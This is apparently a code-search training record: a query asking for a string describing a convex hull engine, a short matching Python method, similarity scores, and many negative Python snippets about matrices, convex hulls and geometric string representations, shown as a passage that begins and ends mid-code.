int((i)*(i+1)/2)\n for k in range(i+1):\n X[:,q+k] = x**(i-k) * y**k\n \n X, z_, indicies = shuffle(X, z)\n X_train, X_test, z_train, z_test = train_test_split(X, z_, test_size=split_train_test, random_state=seed, shuffle=False)\n X_test, X_val, z_test, z_val = train_test_split(X_test, z_test, test_size=split_test_val, random_state=seed, shuffle=False)\n\n return X, X_train, X_test, X_val, z_train, z_test, z_val, indicies", "def recomb_matrix(recomb_coefficients, atomic_number, ion_number):\n offdiag = np.zeros(atomic_number)\n index = recomb_coefficients.index\n for i in index:\n offdiag[i] = recomb_coefficients.loc[i]\n diag = np.hstack([np.zeros(1), -offdiag])\n return (np.diag(diag) + np.diag(offdiag, k=1))[ion_number, :]", "def generate_random_matrix(n):\n return [[random.randint(1, 50) for i in range(n)] for j in range(n)]", "def xn_xn_prod(self,x_n):\n \n x_n_tiled =T.tile(x_n,(self.num_vars,1))\n \n return T.transpose(x_n_tiled)*x_n_tiled", "def eye(n,M=None, k=0, dtype=float):\n return asmatrix(np.eye(n,M,k,dtype))", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def designMatrix(self,x,m):\n\n phi = []\n\n for i in x:\n matric = []\n for j in range(0, m + 1):\n matric.append(np.power(i,j))\n phi.append(matric)\n return np.asarray(phi)", "def generate_model (d):\n return np.random.rand (d+1, 1)", "def complex_matrix(n):\n\n matrix = np.zeros(shape=(n, n), dtype=complex)\n\n for row in np.arange(n):\n if row == 0:\n for col in np.arange(n):\n matrix[row, col] = 1\n else:\n for col in np.arange(n):\n if col == 0:\n matrix[row, col] = 1\n else:\n matrix[row, col] = roots(n, col*row)\n\n return matrix", "def get_extremist_network(Nx, Dx):\n N = np.zeros([Nx, Nx], dtype=int)\n\n for i in range(0, Nx): # Iterate over the upper diagonal only\n for j in range(i+1, Nx):\n r = rg.random() # r is in [0.0, 1.0)\n if r <= Dx:\n N[i][j] = 1\n N[j][i] = 1\n return N", "def bandcholesky(A, d):\n L, dg = LDL(A, d)\n return matrix(L)*diag(sqrt(dg))", "def create_array( n ):", "def build_difs_matrix(xs):\n n = len(xs)\n difs = np.zeros((n, n, 2))\n for row_id in range(n):\n ident = -np.eye(n)\n ident[:, row_id] += 1\n difs[row_id, :, 0] = ident @ xs[:, 0]\n difs[row_id, :, 1] = ident @ xs[:, 1]\n return difs", "def discreteComplexComposeGraph(self,S,n):\n N=len(S)\n M=N//2\n g=[]\n d=0\n for k in range(M):\n d+=S[k+M]*cmath.exp(2j*cmath.pi*k*n/N)+S[-k+M]*cmath.exp(-2j*cmath.pi*k*n/N)\n g.append((d.real,d.imag))\n return g", "def scale(self,n,d=1):\r\n\t\t\r\n\t\t# scale all terms\r\n\t\ts = [i.scale(n,d) for i in self]\r\n\t\t\r\n\t\treturn Li(s)", "def r_vars(size, used=None):\n return r_symbols(size, VAR_SYMBOLS, ARGS.variable_length, used)", "def syndSolveLazy(wdsize): # PENDING to debug\r\n # NameMat = wd2N[wdsize]\r\n r = int(math.ceil(math.log(wdsize, 2)) ) + 2 \r\n \r\n P = k2pmap[wdsize] # get the full parity matrix <kxr> \r\n assert P.shape[0]==wdsize and P.shape[1]==r \r\n finals = '' \r\n s1='assign noerr = '\r\n for i in xrange(r):\r\n ss = '~synd[{0}] & '.format(i) if i !=r-1 else '~synd[{0}];'.format(i) \r\n s1 += ss \r\n\r\n s1 += '\\n' \r\n\r\n finals += s1 \r\n\r\n # neg = lambda x: '~' if x==0 else '' \r\n\r\n s2 = ''\r\n\r\n for idx, name in enumerate(P):\r\n flip_s = 'assign flip[{0}] = '.format(idx)\r\n setbit_ind_array = np.nonzero(name)[0].astype('int') \r\n for i in setbit_ind_array: # set bit index\r\n subs = 'synd[{index}] & '.format(index = i) if i != setbit_ind_array[-1] else \\\r\n 'synd[{index}];'.format( index=i) \r\n flip_s += subs \r\n s2 = s2 + flip_s + '\\n' \r\n\r\n\r\n finals += s2 \r\n\r\n return finals", "def diag_dom(n, num_entries=None):\n if num_entries is None:\n num_entries = int(n**1.5) - n\n A = np.zeros((n,n))\n rows = np.random.choice(np.arange(0,n), size=num_entries)\n cols = np.random.choice(np.arange(0,n), size=num_entries)\n data = np.random.randint(-4, 4, size=num_entries)\n for i in xrange(num_entries):\n A[rows[i], cols[i]] = data[i]\n for i in xrange(n):\n A[i,i] = np.sum(np.abs(A[i])) + 1\n return A", "def expand_dofs(dofs, n_components):\n if dofs.ndim > 1:\n sh = dofs.shape\n dofs = dofs.ravel()\n\n else:\n sh = None\n\n edofs = nm.empty(n_components * dofs.shape[0], nm.int32)\n for idof in range(n_components):\n aux = n_components * dofs + idof\n edofs[idof::n_components] = aux\n\n if sh is not None:\n edofs.shape = sh[:-1] + (-1,)\n\n return edofs", "def symbolize(X, m):\n \n X = np.array(X)\n\n if m >= len(X):\n raise ValueError(\"Length of the series must be greater than m\")\n \n dummy = []\n for i in range(m):\n l = np.roll(X,-i)\n dummy.append(l[:-(m-1)])\n \n dummy = np.array(dummy)\n \n symX = []\n \n for mset in dummy.T:\n rank = stats.rankdata(mset, method=\"min\")\n symbol = np.array2string(rank, separator=\"\")\n symbol = symbol[1:-1]\n symX.append(symbol)\n \n return symX", "def get_X_lasso(n, m):\n\n jHa = np.arange(m * n)\n iHa = np.repeat(np.arange(n), m)\n jHb = np.arange(m * n)\n iHb = np.tile(np.arange(m), n) + n\n j = np.concatenate((jHa, jHb))\n i = np.concatenate((iHa, iHb))\n H = sp.csc_matrix((np.ones(n * m * 2), (i, j)), shape=(n+m, n*m))\n return H", "def MM(x,N,n,l,t=0):\n Mat = np.zeros([2**l,2**l])\n for iii in range(N):\n Mat[iii,(x**n * iii)%N] = 1\n return Mat" ]
[ "0.59795463", "0.5888374", "0.57391495", "0.5711324", "0.5686454", "0.5563071", "0.5492323", "0.5435326", "0.5423058", "0.5419523", "0.54059994", "0.5392236", "0.538575", "0.5366352", "0.5356909", "0.53455615", "0.5337914", "0.5334625", "0.5330213", "0.53227186", "0.53154725", "0.53090394", "0.5283747", "0.5281429", "0.526937", "0.52573615", "0.5251509", "0.52102005", "0.5202278", "0.51470196", "0.5135316", "0.5134825", "0.5132082", "0.5124863", "0.5110964", "0.51070005", "0.51016617", "0.5088285", "0.5072215", "0.5069307", "0.50554955", "0.5036671", "0.5034988", "0.5034725", "0.5011805", "0.5010148", "0.5008242", "0.5007005", "0.49876186", "0.49870697", "0.4985024", "0.49813014", "0.49687636", "0.49648944", "0.49542427", "0.4951821", "0.49510753", "0.4947966", "0.4934529", "0.4932151", "0.49213573", "0.49023703", "0.489465", "0.4887559", "0.48869953", "0.48765406", "0.487493", "0.48700628", "0.48667222", "0.48587996", "0.4850112", "0.48480186", "0.48474178", "0.48402905", "0.48402905", "0.48402905", "0.48332343", "0.48322088", "0.48312396", "0.4821526", "0.4819062", "0.48096684", "0.4808425", "0.4808425", "0.4808123", "0.48002785", "0.47954276", "0.47933435", "0.47853315", "0.47746092", "0.47739026", "0.4773852", "0.47694048", "0.47665554", "0.4763099", "0.47616357", "0.47612846", "0.4755161", "0.47484088", "0.47371075" ]
0.58973736
1
r""" Return a string that describes the convex hull engine.
def convex_hull_engine(self): return self.convex_hull._name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _repr_(self):\n desc = ''\n if self.n_vertices()==0:\n desc += 'The empty polyhedron'\n else:\n desc += 'A ' + repr(self.dim()) + '-dimensional polyhedron'\n desc += ' in '\n if self.field()==QQ: desc += 'QQ'\n else: desc += 'RDF'\n desc += '^' + repr(self.ambient_dim()) \n\n if self.n_vertices()>0:\n desc += ' defined as the convex hull of ' \n desc += repr(self.n_vertices())\n if self.n_vertices()==1: desc += ' vertex'\n else: desc += ' vertices'\n \n if self.n_rays()>0:\n if self.n_lines()>0: desc += \", \"\n else: desc += \" and \"\n desc += repr(self.n_rays())\n if self.n_rays()==1: desc += ' ray'\n else: desc += ' rays'\n \n if self.n_lines()>0:\n if self.n_rays()>0: desc += \", \"\n else: desc += \" and \"\n desc += repr(self.n_lines())\n if self.n_lines()==1: desc +=' line'\n else: desc +=' lines'\n\n return desc + \".\\n\";", "def convex_hull(self):\n return self._geomgen(capi.geom_convex_hull)", "def convex_hull(self):\n return _property_geo(arctern.ST_ConvexHull, self)", "def _repr_(self):\n return \"Projective hypersurface defined by %s in %s\"%(\n self.defining_polynomial(), self.ambient_space())", "def _repr_(self):\n return \"Affine hypersurface defined by %s in %s\"%(\n self.defining_polynomial(), self.ambient_space())", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n cont = 1\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n print(\"antes \"), print(cont), print(lower)\n lower.pop()\n print(\"despues \"),print(lower)\n cont += 1\n lower.append(p)\n xlower ,ylower = getlists(lower)\n plt.plot(xlower,ylower,color=\"yellow\")\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n print(upper)\n print(\"hello2 \")\n print(cross((2,0),(2,4),(2.5,3)))\n\n xupper ,yupper = getlists(upper)\n plt.plot(xupper,yupper,color=\"blue\")\n\n\n return lower[:-1] + upper[:-1]", "def _repr_(self):\n s = 'The projection of a polyhedron into ' + repr(self.dimension) \n s += ' dimensions.'\n return s + \"\\n\"", "def hull(self):\n capacity = self._getAttribute(Attribute.hullCapacity)\n em = self._getAttribute(Attribute.hullEM)\n explosive = self._getAttribute(Attribute.hullExplosive)\n kinetic = self._getAttribute(Attribute.hullKinetic)\n thermal = self._getAttribute(Attribute.hullThermal)\n\n em = 1.0 - em\n explosive = 1.0 - explosive\n kinetic = 1.0 - kinetic\n thermal = 1.0 - thermal\n\n return {\n \"capacity\": capacity,\n \"resists\": {\n \"em\": em,\n \"explosive\": explosive,\n \"kinetic\": kinetic,\n \"thermal\": thermal\n }\n }", "def convex_hull(self):\n nodes = self._datacontroller.get_data('nodes')\n scale = self._datacontroller.get_data('scale')\n hull = tsputil.convex_hull_helper(nodes)\n if hull:\n result = construct_step(hull, 'Most Top Left Node', 'Clockwise', nodes, scale)\n self._datacontroller.commit_change('path', result)", "def getContourRep(self):\n\t\tvertex1 = [[self.startX, self.startY]]\n\t\tvertex2 = [[self.startX, self.endY]]\n\t\tvertex3 = [[self.endX, self.startY]]\n\t\tvertex4 = [[self.endX, self.endY]]\n\t\tvertices = [vertex1, vertex2, vertex3, vertex4]\n\t\treturn convexHull(np.asarray(vertices, dtype = np.int32))", "def __str__(self):\n vertices = []\n for idx in range(3):\n v = self.vertices[idx]\n if v is not None:\n vertices.append(str(v))\n else:\n orig_idx, dest_idx = (idx - 1) % 3, (idx + 1) % 3\n orig, dest = self.vertices[orig_idx], self.vertices[dest_idx]\n halfway = (orig.x + dest.x) * .5, (orig.y + dest.y) * .5\n# print(halfway)\n d = orig.distance(dest)\n dx = dest.x - orig.x\n# print(d)\n# print(dx)\n dx /= d\n dy = dest.y - orig.y\n# print(dy)\n dy /= d\n dx *= d\n dy *= d\n pt_halfway = halfway[0] + dy, halfway[1] - dx\n# print(\"outside\", orig_idx, dest_idx, pt_halfway)\n vertices.append(\"{0[0]} {0[1]}\".format(pt_halfway))\n vertices.append(vertices[0])\n return \"POLYGON(({0}))\".format(\", \".join(vertices))", "def _repr_(self):\n desc = ''\n if self.n_vertices()==0:\n desc += 'The empty lattice polytope'\n else:\n desc += 'A ' + repr(self.affine_dimension()) + '-dimensional lattice polytope'\n desc += ' in ZZ^' + repr(self.space_dimension())\n\n if self.n_vertices()>0:\n desc += ' with '\n desc += repr(self.n_vertices())\n if self.n_vertices()==1: desc += ' vertex'\n else: desc += ' vertices'\n return desc", "def give_convex_hull(rand_points):\n return ConvexHull(rand_points)", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull \n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list. \n return lower[:-1] + upper[:-1]", "def convex_hull(self):\n if self._faces is None:\n if self._vertices is None:\n return None\n self.triangulate()\n return self._convex_hull", "def display_and_label_hulls(self, hulls, src):\n \n labels = []\n\n for hull in hulls:\n\n angle = 0\n MA = 1\n ma = 1\n try:\n _,(MA,ma),angle = cv.fitEllipse(hull)\n except:\n pass\n cosAngle = np.abs(np.cos(angle*np.pi/180))\n\n # Only human-classify hulls if it is reasonably a vertically oriented rectangle\n # This is a hueristic to not have to waste time clasifying hulls clearly not poles\n if (cosAngle < 1.75) and (cosAngle > 0.85) and (MA/ma < 0.28):\n cpy = src.copy()\n hull_img = cv.polylines(cpy, [hull], True, (0,0,255), 3)\n cv.imshow(\"Hull\", hull_img)\n keycode = cv.waitKey(0)\n if keycode == 49:\n labels.append((hull, 0))\n print(\"Not a Pole\")\n elif keycode == 50:\n labels.append((hull, 1))\n print(\"A Pole!\")\n else:\n raise Exception(\"Unexpected Key Pressed\")\n else:\n labels.append((hull, 0))\n cv.destroyAllWindows()\n return labels", "def __str__(self):\n if self.getType() == FRAGMENT:\n t = \"FRAGMENT\"\n else:\n t = \"VERTEX\"\n if not self.isCompiled():\n s = \"not compiled\"\n else:\n s = \"compiled\"\n return \"file: {0}\\ntype: {1}\\nstatus: {2}\\n\".format(self.getPath(), t, s)", "def __str__(self):\n return \"hl(\" + str(self.point) + \",\" + str(self.angle) + \")\"", "def convex_hull(points):\n pointList = ExtendedTupleList(points)\n complete_ranges = pointList.range_within(0, 1)\n # Filters for four quadrants\n filters = [\n ((0, complete_ranges[1][\"max\"][2], \">=\"), (1, complete_ranges[0][\"max\"][2], \">=\")), #Q1\n ((0, complete_ranges[1][\"max\"][1], \"<=\"), (1, complete_ranges[0][\"min\"][2], \">=\")), #Q2\n ((0, complete_ranges[1][\"min\"][1], \"<=\"), (1, complete_ranges[0][\"min\"][1], \"<=\")), #Q3\n ((0, complete_ranges[1][\"min\"][2], \">=\"), (1, complete_ranges[0][\"max\"][1], \"<=\")) #Q4\n ]\n # Sorting reversals (True means Desc sort, False means Asc sort. Y sort given first)\n sorts = [\n (True, True),\n (True, False),\n (False, False),\n (False, True),\n ]\n hull = ExtendedTupleList([])\n # In CW order of quadrants...\n for index in [0, 3, 2, 1]:\n # Find all the relevant points\n quad_points = ExtendedTupleList([point for point in pointList.filter(filters[index])])\n # Sort them properly\n quad_points.double_sort(1, 0, reverse_outside=sorts[index][0], reverse_inside=sorts[index][1])\n # Build a convex line segment\n line_segment = convex_line_segment(quad_points, sorts[index][0], sorts[index][1])\n # Reverse it, if we need to\n if index % 2 == 1:\n line_segment.reverse()\n # Add all the points in, avoiding repeated points.\n hull.extend(line_segment, avoid_repeats=True)\n return hull", "def convex_hull(l):\n\tpass", "def show_convex_hull(points, input_choice, timing,percent_pts,size,hull_points = None):\n\texists = os.path.isdir('plots')\n\tif not exists: \n\t\tos.mkdir('plots')\n\n\n\tfor each in points:\n\t\tplt.plot(each[0],each[1],'o-')\n\n\tif hull_points is not None:\n\t\thull_pt_list = []\n\t\tfor each in hull_points:\n\t\t\thull_pt_list.append(list(each))\n\n\t\thull_pt_arr = np.asarray(hull_pt_list)\n\t\t# print(hull_pt_arr)\n\t\tplt.plot(hull_pt_arr[:,0],hull_pt_arr[:,1],'k-')\n\t\tfirst_coord = hull_pt_arr[0,:].reshape(1,2)\n\t\tlast_coord = hull_pt_arr[len(hull_pt_arr)-1,:].reshape(1,2)\n\n\t\tlast_coord_arr = np.append(first_coord, last_coord, axis = 0)\n\t\tplt.plot(last_coord_arr[:,0],last_coord_arr[:,1],'k-')\n\t\tplt.title(label = 'For input : '+input_choice+percent_pts+' time taken = '+str(timing)+' s\\n'+'N='+str(size))\n\t\n\tplt.savefig('plots/'+'Graham_Scan_'+str(input_choice)+str(percent_pts)+'_N='+str(size)+'.png')\n\tplt.show()", "def to_str(self):\n return u\"Superellipse[{:.4g},{:.4g}]\".format(self.alpha0.l, self.alpha0.r)", "def convex_hull(*args):\n from point import Point\n from line import Segment\n from polygon import Polygon\n\n def uniquify(a):\n # not order preserving\n return list(set(a))\n\n p = args[0]\n if isinstance(p, Point):\n p = uniquify(args)\n\n if len(p) == 1:\n return p[0]\n elif len(p) == 2:\n return Segment(p[0], p[1])\n\n def orientation(p, q, r):\n '''Return positive if p-q-r are clockwise, neg if ccw, zero if\n collinear.'''\n return (q[1] - p[1])*(r[0] - p[0]) - (q[0] - p[0])*(r[1] - p[1])\n\n # scan to find upper and lower convex hulls of a set of 2d points.\n U = []\n L = []\n p.sort()\n for p_i in p:\n while len(U) > 1 and orientation(U[-2], U[-1], p_i) <= 0:\n U.pop()\n while len(L) > 1 and orientation(L[-2], L[-1], p_i) >= 0:\n L.pop()\n U.append(p_i)\n L.append(p_i)\n U.reverse()\n convexHull = tuple(L + U[1:-1])\n\n if len(convexHull) == 2:\n return Segment(convexHull[0], convexHull[1])\n return Polygon(convexHull)", "def visualHull(sils, length):\n result = sils.pop(0).cone(length)\n assert result.pnFacesInPoly()\n i = 0\n for s in sils:\n # print(i)\n assert result.pnFacesInPoly()\n result = result.intersection(s.cone(length), True)\n # result.plot()\n i += 1\n return result", "def make_convex_hull(self):\n hull_points_d = []\n try:\n print \"self.V_bar_list_d******************\", self.V_bar_list_d\n hull = ConvexHull(self.V_bar_list_d)\n hull_vertices = hull.vertices\n\n for i in hull_vertices:\n hull_points_d.append(self.V_bar_list_d[i])\n\n except scipy.spatial.qhull.QhullError:\n hull_points_d = self.V_bar_list_d\n\n return hull_points_d", "def formatted_str(self):\n # Verify correct vertex values\n self.verify_vertex_values()\n # Generate output string\n output_string = \"\"\n for line in range(9):\n for row in range(9):\n if self.grid[line][row] is None:\n output_string += \".\"\n else:\n output_string += str(self.grid[line][row])\n if row != 8:\n output_string += \" \"\n elif line != 8:\n output_string += \"\\n\"\n if row in [2, 5]:\n output_string += \"| \"\n if line in [2, 5]:\n output_string += \"------+-------+------\\n\"\n return output_string", "def _convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list.\n return lower[:-1] + upper[:-1]", "def __str__(self):\n puzzle_string = '—' * 13 + '\\n'\n for i in range(self.PUZZLE_NUM_ROWS):\n for j in range(self.PUZZLE_NUM_COLUMNS):\n puzzle_string += '│{0: >2}'.format(str(self.position[i][j]))\n if j == self.PUZZLE_NUM_COLUMNS - 1:\n puzzle_string += '│\\n'\n\n puzzle_string += '—' * 13 + '\\n'\n return puzzle_string", "def draw(self):\n drawing = \"\"\n \n if self.get_gene().get_choice_at(1) is 'c':\n drawing += 'o'\n else:\n drawing += 'x'\n \n if self.is_tft():\n drawing += \"tft\"\n return drawing\n elif self.is_t2t():\n drawing += \"t2t\"\n return drawing\n elif self.is_ftf():\n drawing += \"ftf\"\n return drawing\n\n rule = self.get_gene().get_defect_fraction()\n fraction_display = 0.166\n\n if rule >= 1.0:\n drawing += \"ddd\"\n elif rule > (5*fraction_display):\n drawing += \"ddc\"\n elif rule > (4*fraction_display):\n drawing += \"dcd\"\n elif rule > (3*fraction_display):\n drawing += \"dcc\"\n elif rule > (2*fraction_display):\n drawing += \"cdd\"\n elif rule > (1*fraction_display):\n drawing += \"cdc\"\n elif rule > (0*fraction_display):\n drawing += \"ccd\"\n else:\n drawing += \"ccc\"\n\n return drawing", "def construct_convex_hull(vertices: Sequence[Point]) -> Polyhedron:\n coords = np.zeros((len(vertices),3))\n for i,vertex in enumerate(vertices):\n coords[i,:] = vertex.coordinates\n hull = qconvex(\"i\", coords)\n n_facets = int(hull[0])\n facets = []\n for facet_vertices_str in hull[1:]:\n facet_vertices_idx = [int(x) for x in facet_vertices_str.split(' ')]\n facet_vertices = [vertices[i] for i in facet_vertices_idx]\n facet = Facet([Contour.from_vertices(facet_vertices)])\n facets.append(facet)\n polyhedron = Polyhedron(facets)\n return polyhedron", "def __str__(self):\n output = 'Pathogens:\\n'\n for x in self.extant_p:\n output += ' n %s h %f d %f host %s extant\\n' % (x.name, x.height, x.dist, x.host.name)\n for x in self.not_extant_p:\n output += ' n %s h %f d %f host %s not extant\\n' % (x.name, x.height, x.dist, x.host.name)\n for x in self.not_yet_sampled_p:\n output += ' n %s h %f d %f host %s not yet sampled\\n' % (x.name, x.height, x.dist, x.host.name)\n\n output += 'Hosts:\\n'\n for x in self.extant_h:\n output += ' %s %f %f extant\\n' % (x.name, x.height, x.dist)\n for x in self.not_extant_h:\n output += ' %s %f %f not extant\\n' % (x.name, x.height, x.dist)\n for x in self.not_yet_sampled_h:\n output += ' %s %f %f not yet sampled\\n' % (x.name, x.height, x.dist)\n\n return output", "def __str__(self) -> str:\n if self.decorator is None:\n decorator_str = \"\"\n elif self.decorator:\n decorator_str = \"+\"\n else:\n decorator_str = \"-\"\n return \" \".join([\"The nilpotent orbit corresponding\",\n f\"to partition {self.my_diagram}{decorator_str}\",\n f\"in type {self.my_type.letter()} {self.lie_rank}\"])", "def __repr__(self):\n return 'Polygon({%s})' % \", \".join(str(line) for line in self.lines)", "def __str__(self):\n s = \"\"\n for i in range(13,25):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n s += '\\n'\n for i in range(12, 0,-1):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n return s", "def __str__(self) -> str:\n if self.scalar_vector:\n return f\"({self.w:-.4f} {self.x:+.4f}i {self.y:+.4f}j {self.z:+.4f}k)\"\n return f\"({self.x:-.4f}i {self.y:+.4f}j {self.z:+.4f}k {self.w:+.4f})\"", "def convex_hull(self):\n if isinstance(self.crs, GeographicalCRS):\n raise CRSError(\"not implemented for geographical coordinate \"\n \"systems. Project to a projected coordinate system.\")\n\n points = [pt for pt in self]\n\n # Find the lowermost (left?) point\n pt0 = points[0]\n idx = 0\n for i, pt in enumerate(points[1:]):\n if (pt.y < pt0.y) or ((pt.y == pt0.y) and (pt.x < pt0.x)):\n pt0 = pt\n idx = i+1\n points.pop(idx)\n\n # Sort CCW relative to pt0, and drop all but farthest of any duplicates\n points.sort(key=lambda pt: pt0.distance(pt))\n points.sort(key=lambda pt: _cvectorgeo.polarangle(pt0.vertex, pt.vertex))\n alpha = -1\n drop = []\n for i,pt in enumerate(points):\n a = _cvectorgeo.polarangle(pt0.vertex, pt.vertex)\n if a == alpha:\n drop.append(i)\n else:\n alpha = a\n\n if len(drop) != 0:\n for i in drop[::-1]:\n points.pop(i)\n\n # initialize convex hull\n if len(points) == 2:\n return Polygon([pt0, points[0], points[1]])\n elif len(points) == 1:\n raise GeometryError(\"convex polygon not defined for two points\")\n else:\n\n S = [pt0, points[0], points[1]]\n for pt in points[2:]:\n while not _cvectorgeo.isleft(S[-2].vertex, S[-1].vertex, pt.vertex):\n S.pop()\n S.append(pt)\n\n return Polygon(S, crs=self.crs)", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross\n # product. Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n return lower, upper", "def name(self):\n return \"cnotdihedral\"", "def solution_to_string(self):\n solution_vector_index_format = [index+1 if elem == 1 else -index-1 for index, elem in enumerate(self.solution_vector)]\n return \" \".join(map(str, solution_vector_index_format))", "def __repr__(self) -> str:\n return_string = str()\n\n return_string += f\"Representation of dataset with {len(self.internal_types)} elements:\\n\"\n return_string += f\"List of categories:\\t{self.internal_types}\\n\"\n return_string += f\"First and last 5 features:\\n\"\n for i in range(5):\n return_string += f\"\\t{self.internal_data[i]}\\n\"\n return_string += f\"\\t...\\n\"\n for i in range(4, -1, -1):\n return_string += f\"\\t{self.internal_data[i]}\\n\"\n return_string += \"For more information, use debugger.\"\n\n return return_string", "def hull_convex(ob, me, selected_only, precision = 0.1):\n # find convex hull\n vertices, triangles = pyffi.utils.quickhull.qhull3d(\n [tuple(v.co) for v in me.verts if v.sel or not selected_only],\n precision = precision)\n # create convex mesh\n box = Blender.Mesh.New('convexpoly')\n for vert in vertices:\n box.verts.extend(*vert)\n for triangle in triangles:\n box.faces.extend(triangle)\n # link mesh to scene and set transform\n scn = Blender.Scene.GetCurrent()\n boxob = scn.objects.new(box, 'convexpoly')\n boxob.setMatrix(ob.getMatrix('worldspace'))\n # set bounds type\n boxob.drawType = Blender.Object.DrawTypes['BOUNDBOX']\n boxob.rbShapeBoundType = 5 # convex hull shape not in blender Python API; Blender.Object.RBShapes['CONVEXHULL']?\n boxob.drawMode = Blender.Object.DrawModes['WIRE']", "def __str__(self):\n inside_list = lambda _v, _h, a: any(x == _h and y == _v for y, x in a)\n resultant = ''\n for _v in range(1, self.size_v + 1):\n for _h in range(1, self.size_h + 1):\n if self.current_location[1] == _h and self.current_location[0] == _v:\n resultant = resultant + '@'\n elif inside_list(_v, _h, self.boxes):\n resultant = resultant + '$'\n elif inside_list(_v, _h, self.storage_locations):\n resultant = resultant + '.'\n elif inside_list(_v, _h, self.wall_squares):\n resultant = resultant + '#'\n else:\n resultant = resultant + ' '\n resultant = resultant + '\\n'\n\n return resultant", "def __repr__(self):\n\t\tret = \"\"\n\t\tfor i, x in enumerate(self.squares):\n\n\t\t\tret += \"\\t\"\n\t\t\tfor j in range(32): ret += u\"\\u2015\"\n\t\t\tret += \"\\n\\t|\"\n\t\t\tfor y in x:\n\t\t\t\tret += str(y)\n\t\t\t\tret += \" | \"\n\n\t\t\tret += str(i+1) + \"\\n\"\n\n\t\tret += \"\\t\"\n\t\tfor i in range(32): ret += u\"\\u2015\"\n\t\tret += \"\\n \"\n\n\t\tfor l in self.letters:\n\t\t\tret += l+\" \"\n\t\treturn ret", "def __repr__(self) -> str:\n context = \" \".join(\"{}={}\".format(k, v) for k, v in self._solution.items())\n return \"<Twilio.Supersim.V1.FleetContext {}>\".format(context)", "def convex_hull(points):\n points = np.array(points)\n hull = ConvexHull(points)\n return points[hull.vertices, :]", "def __str__(self):\n if self.fshader is None:\n f = \"not defined\"\n else:\n f = self.fshader.getPath()\n if self.vshader is None:\n v = \"not defined\"\n else:\n v = self.vshader.getPath()\n if self.enabled:\n e = \"enabled\"\n else:\n e = \"disabled\"\n if self.isCompiled():\n c = \"compiled | {0}\".format(e)\n else:\n c = \"not compiled | {0}\".format(e)\n return \"shader: {3}\\nfragment shader: {0}\\nvertex shader: {1}\\nstatus: {2}\".format(f, v, c, self.getName())", "def find_convex_hull(ctx: Context):\n if ctx.contours is None or len(ctx.contours) == 0:\n return 0\n\n max_defects = 0\n defects = None\n contour = None\n for c in ctx.contours:\n ctx.hull = 